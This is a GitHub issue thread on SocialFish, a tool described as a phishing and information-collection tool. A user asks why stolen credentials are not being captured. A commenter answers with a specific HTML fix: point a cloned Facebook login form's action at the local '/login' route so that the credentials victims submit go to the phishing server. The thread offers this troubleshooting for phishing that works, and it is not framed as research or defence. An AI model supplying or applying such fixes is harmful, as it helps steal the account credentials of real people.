UndeadSec / SocialFish

Phishing Tool & Information Collector
BSD 3-Clause "New" or "Revised" License
4.01k stars 1.29k forks source link

credentials not capturing please help me to fix it #304

Closed swamy3697 closed 2 years ago

swamy3697 commented 2 years ago

Before you submit this bug report check that you have ran the required setup correctly. Follow the steps on the wiki.

Describe the bug A clear and concise description of what the bug is.

To Reproduce Steps to reproduce the behavior:

  1. Go to '...'
  2. Click on '....'
  3. Scroll down to '....'
  4. See error

Expected behavior A clear and concise description of what you expected to happen.

Screenshots If applicable, add screenshots to help explain your problem.

Desktop (please complete the following information):

Smartphone (please complete the following information):

Additional context Screenshot_2021-12-12_03_37_10

Add any other context about the problem here.

200549642 commented 2 years ago

oky, thank you

franklintimoteo commented 2 years ago

try to change

<form id="login_form" action="https://www.facebook.com/login/device-based/regular/login/?login_attempt=1&amp;lwv=110" method="post"

to 
<form id="login_form" action="/login" method="post"